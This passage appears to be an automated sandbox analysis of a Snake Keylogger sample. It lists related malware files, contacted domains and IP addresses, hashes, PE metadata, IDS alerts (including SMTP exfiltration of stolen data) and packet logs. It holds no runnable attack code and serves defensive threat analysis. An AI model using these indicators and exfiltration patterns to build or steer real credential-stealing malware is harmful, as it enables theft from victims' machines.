            Confirmation transfer Note AGS # 22-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • checkip.dyndns.org/
            rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
            • checkip.dyndns.org/
            z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • checkip.dyndns.org/
            rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
            • checkip.dyndns.org/
            rRFQ_025261-97382.exeGet hashmaliciousSnake KeyloggerBrowse
            • checkip.dyndns.org/
            SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
            • checkip.dyndns.org/
            SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
            • checkip.dyndns.org/

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            reallyfreegeoip.orgnew order 00041221.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
            • 188.114.97.3
            New order.exeGet hashmaliciousSnake KeyloggerBrowse
            • 188.114.97.3
            New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
            • 188.114.96.3
            Payment_Advice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 188.114.97.3
            LPO-9180155-PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 188.114.97.3
            Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 188.114.96.3
            Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 188.114.97.3
            Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 188.114.96.3
            Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
            • 188.114.97.3
            DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
            • 188.114.97.3
            checkip.dyndns.comnew order 00041221.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
            • 193.122.6.168
            New order.exeGet hashmaliciousSnake KeyloggerBrowse
            • 193.122.6.168
            New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
            • 193.122.130.0
            Payment_Advice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 193.122.6.168
            LPO-9180155-PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 132.226.247.73
            Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 193.122.6.168
            Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 193.122.6.168
            Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 158.101.44.242
            Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
            • 132.226.247.73
            DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
            • 158.101.44.242

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            CLOUDFLARENETUSfile.exeGet hashmaliciousUnknownBrowse
            • 104.21.72.79
            file.exeGet hashmaliciousUnknownBrowse
            • 104.21.72.79
            RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
            • 188.114.96.3
            http://cognitoforms.com/Renato4/ManagementHasAddedYouToAWholeTeamGet hashmaliciousHTMLPhisherBrowse
            • 188.114.96.3
            https://nasyiahgamping.com/_loader.html?send_id=eh&tvi2_RxT=cp.appriver.com%2Fservices%2Fspamlab%2Fhmr%2FPrepareHMRAccess.aspx%3Fex%3DCwl7OpqsAW8UXOjQpfNORMYziqeg%252fwcMKDuZuqPM%252b44%253d%26et%3DSCXX1gC0hGLFIJMBjJa%252bcPyzP9zDkcUvJzlJx8HAPYIwHybHJtlKKhvlY68%252fb09k%252bq%252fmbrOOqiV%252brsXviFPAevdalHsK83HP&url=aHR0cHM6Ly9maW5hbmNlcGhpbGUuY29tL3dwLWluY2x1ZGVzL2ltZy9kLnNhdXRpZXJAc2JtLm1jGet hashmaliciousHTMLPhisherBrowse
            • 188.114.96.3
            file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
            • 172.64.41.3
            file.exeGet hashmaliciousBabadedaBrowse
            • 172.64.41.3
            https://forms.office.com/r/xULzprLcwHGet hashmaliciousUnknownBrowse
            • 104.18.94.41
            file.exeGet hashmaliciousBabadedaBrowse
            • 172.64.41.3
            SecuriteInfo.com.Trojan.PackedNET.738.1574.9831.exeGet hashmaliciousAgentTeslaBrowse
            • 172.67.74.152
            ORACLE-BMC-31898USnew order 00041221.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
            • 193.122.6.168
            New order.exeGet hashmaliciousSnake KeyloggerBrowse
            • 158.101.44.242
            http://docusign.netGet hashmaliciousUnknownBrowse
            • 192.29.14.118
            New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
            • 193.122.130.0
            Payment_Advice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 193.122.6.168
            Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 193.122.6.168
            Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 193.122.6.168
            Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 158.101.44.242
            Lisect_AVT_24003_G1B_67.exeGet hashmaliciousUnknownBrowse
            • 158.101.28.51
            DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
            • 158.101.44.242
            NIOBEBILISIMHIZMETLERITRfile.exeGet hashmaliciousSystemBCBrowse
            • 77.245.149.25
            #U0130#U015eLEM #U00d6ZET#U0130_G5024057699-1034 nolu TICARI.exeGet hashmaliciousAgentTeslaBrowse
            • 77.245.148.100
            SKM_C3350i2402291223.bat.exeGet hashmaliciousAgentTeslaBrowse
            • 77.245.148.65
            Overdue Account Notice.exeGet hashmaliciousAgentTeslaBrowse
            • 77.245.159.10
            Product list.png.exeGet hashmaliciousAgentTeslaBrowse
            • 77.245.159.10
            NEW PURCHASE ORDER.png.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 77.245.159.10
            1AIemYSAZy.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, StealcBrowse
            • 77.245.149.43
            SecuriteInfo.com.Win32.TrojanX-gen.10323.31552.exeGet hashmaliciousAgentTeslaBrowse
            • 77.245.159.10
            11_12_2023_D#U00f6nemi_MEVDUAT_Ekstre_Bilgiler.exeGet hashmaliciousAgentTesla, zgRATBrowse
            • 185.87.254.58
            phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
            • 77.245.154.98

            JA3 Fingerprints

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            54328bd36c14bd82ddaa0c04b25ed9adnew order 00041221.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
            • 188.114.97.3
            New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
            • 188.114.97.3
            LisectAVT_2403002B_361.exeGet hashmaliciousQuasarBrowse
            • 188.114.97.3
            SWIFT.exeGet hashmaliciousLokibotBrowse
            • 188.114.97.3
            Payment_Advice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 188.114.97.3
            LPO-9180155-PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 188.114.97.3
            Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 188.114.97.3
            Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 188.114.97.3
            Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
            • 188.114.97.3
            Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
            • 188.114.97.3

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.log

            Download File
            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1216
            Entropy (8bit):5.34331486778365
            Encrypted:false
            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
            MD5:1330C80CAAC9A0FB172F202485E9B1E8
            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
            Malicious:true
            Reputation:high, very likely benign file
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):2232
            Entropy (8bit):5.3797706053345555
            Encrypted:false
            SSDEEP:48:fWSU4xymI4RW9oUP7gZ9tK8NPZHUk7u1iMuge//8PUyus:fLHxvII5LZ2KRHzOug8s
            MD5:921295ABE821F5314EA32FAE20AA20A8
            SHA1:E9C36E2346406C33708D1BD697C5E77CC314725F
            SHA-256:1408E4F33B496A19464F2CA826B7D935149E1163783CC03D898E0413F6DF7C42
            SHA-512:C94D7E07BE1D0C08A2AD76CE4BCCA1D092B8129E4167AD74FBFD4571596AF5E580985761E549DE0BB34958F8818C052F1A74E025A1F6F4BF87E47ACA4D6EE690
            Malicious:false
            Reputation:low
            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etzjvjg0.wmm.ps1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jiyp3wbu.rth.psm1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n2r2dr4j.nie.ps1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oogphext.xhn.psm1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Entropy (8bit):7.970686628272919
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            • Win32 Executable (generic) a (10002005/4) 49.78%
            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
            • Generic Win/DOS Executable (2004/3) 0.01%
            • DOS Executable Generic (2002/1) 0.01%
            File name:SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            File size:516'096 bytes
            MD5:967175d3aa79388fd8e84ccbf0b998c7
            SHA1:9bb041c883354d306a22ea0faf9c8deecd9f14c0
            SHA256:4607e74d7d23628239d2bdfc8d57236c09778517f758323e13fc9ca4092c07a7
            SHA512:e9d65b50fd28f0fc13c88c7d515906f32e29b6a545f0b5ad2bf0d16a83f7bc619d698cd6ae5e294f1a419d3dc5928cc86176b551578d665dda8fcb451f16003b
            SSDEEP:12288:KrHa5vF0t2/Vdh44WHdaZOyWtLLH4PgRuHTJnrwY:Ka37dd7sdaZdITRATJnrw
            TLSH:14B4230A2BC3D729DBF94BB50694844467F8B024B0B5EFAC5DE881DE0E9A7C18D721D7
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...rF.f..............0.................. ........@.. .......................@............@................................

            File Icon

            Icon Hash:00928e8e8686b000

            Static PE Info

            General

            Entrypoint:0x47f5be
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Time Stamp:0x66A34672 [Fri Jul 26 06:47:14 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

            Entrypoint Preview

            Instruction
            jmp dword ptr [00402000h]
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x7f56a0x4f.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x800000x5ac.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x820000xc.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x7dbf40x54.text
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x20000x7d5c40x7d600b234b1b01e7e5a0d783e46e95dac8a33False0.9708511185194417data7.977489549607041IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rsrc0x800000x5ac0x6002c12f40f05cdc19db2479e3f25077cbcFalse0.4205729166666667data4.079124777457321IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x820000xc0x200ee72df9019bfd262c46bb70a0ca3b872False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_VERSION0x800900x31cdata0.43467336683417085
            RT_MANIFEST0x803bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

            Imports

            DLLImport
            mscoree.dll_CorExeMain

            Network Behavior

            Suricata IDS Alerts

            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
            2024-07-26T11:39:04.892508+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4970680192.168.2.5158.101.44.242
            2024-07-26T11:39:07.660193+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49713443192.168.2.5188.114.97.3
            2024-07-26T11:39:11.471883+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49719443192.168.2.5188.114.97.3
            2024-07-26T11:39:45.208289+0200TCP2044767ET MALWARE Snake Keylogger Exfil via SMTP49734587192.168.2.577.245.159.7
            2024-07-26T11:39:06.402996+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49711443192.168.2.5188.114.97.3
            2024-07-26T11:39:17.988539+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972420.12.23.50192.168.2.5
            2024-07-26T11:39:35.846618+0200TCP2044767ET MALWARE Snake Keylogger Exfil via SMTP49731587192.168.2.577.245.159.7
            2024-07-26T11:39:05.782404+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4970680192.168.2.5158.101.44.242
            2024-07-26T11:39:38.805311+0200TCP2044767ET MALWARE Snake Keylogger Exfil via SMTP49732587192.168.2.577.245.159.7
            2024-07-26T11:38:56.204357+0200TCP2044767ET MALWARE Snake Keylogger Exfil via SMTP49730587192.168.2.577.245.159.7
            2024-07-26T11:39:08.938329+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49715443192.168.2.5188.114.97.3
            2024-07-26T11:39:07.032437+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4971280192.168.2.5158.101.44.242
            2024-07-26T11:39:55.942378+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973620.12.23.50192.168.2.5

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jul 26, 2024 11:38:59.504123926 CEST4970680192.168.2.5158.101.44.242
            Jul 26, 2024 11:38:59.509206057 CEST8049706158.101.44.242192.168.2.5
            Jul 26, 2024 11:38:59.509282112 CEST4970680192.168.2.5158.101.44.242
            Jul 26, 2024 11:38:59.511497021 CEST4970680192.168.2.5158.101.44.242
            Jul 26, 2024 11:38:59.516836882 CEST8049706158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:01.480242014 CEST8049706158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:01.486656904 CEST4970680192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:01.491547108 CEST8049706158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:04.847099066 CEST8049706158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:04.887263060 CEST49710443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:04.887305021 CEST44349710188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:04.890470982 CEST49710443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:04.892508030 CEST4970680192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:04.896044016 CEST49710443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:04.896064997 CEST44349710188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:05.382685900 CEST44349710188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:05.382807016 CEST49710443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:05.389226913 CEST49710443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:05.389234066 CEST44349710188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:05.389481068 CEST44349710188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:05.438653946 CEST49710443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:05.439707994 CEST49710443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:05.480514050 CEST44349710188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:05.550143957 CEST44349710188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:05.550228119 CEST44349710188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:05.550298929 CEST49710443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:05.556344032 CEST49710443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:05.559277058 CEST4970680192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:05.564239025 CEST8049706158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:05.731045961 CEST8049706158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:05.733449936 CEST49711443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:05.733546019 CEST44349711188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:05.733638048 CEST49711443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:05.734004021 CEST49711443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:05.734035015 CEST44349711188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:05.782403946 CEST4970680192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:06.258131981 CEST44349711188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:06.261246920 CEST49711443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:06.261274099 CEST44349711188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:06.402828932 CEST44349711188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:06.402888060 CEST44349711188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:06.402965069 CEST49711443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:06.403424978 CEST49711443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:06.407903910 CEST4970680192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:06.408332109 CEST4971280192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:06.413151026 CEST8049712158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:06.413233042 CEST4971280192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:06.413347006 CEST4971280192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:06.413584948 CEST8049706158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:06.416022062 CEST4970680192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:06.418185949 CEST8049712158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:06.989404917 CEST8049712158.101.44.242192.168.2.5
            Jul 26, 2024 11:39:06.997026920 CEST49713443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:06.997078896 CEST44349713188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:06.997895956 CEST49713443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:06.998126984 CEST49713443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:06.998143911 CEST44349713188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:07.032437086 CEST4971280192.168.2.5158.101.44.242
            Jul 26, 2024 11:39:07.508771896 CEST44349713188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:07.510747910 CEST49713443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:07.510831118 CEST44349713188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:07.660165071 CEST44349713188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:07.660228014 CEST44349713188.114.97.3192.168.2.5
            Jul 26, 2024 11:39:07.660295010 CEST49713443192.168.2.5188.114.97.3
            Jul 26, 2024 11:39:07.660988092 CEST49713443192.168.2.5188.114.97.3
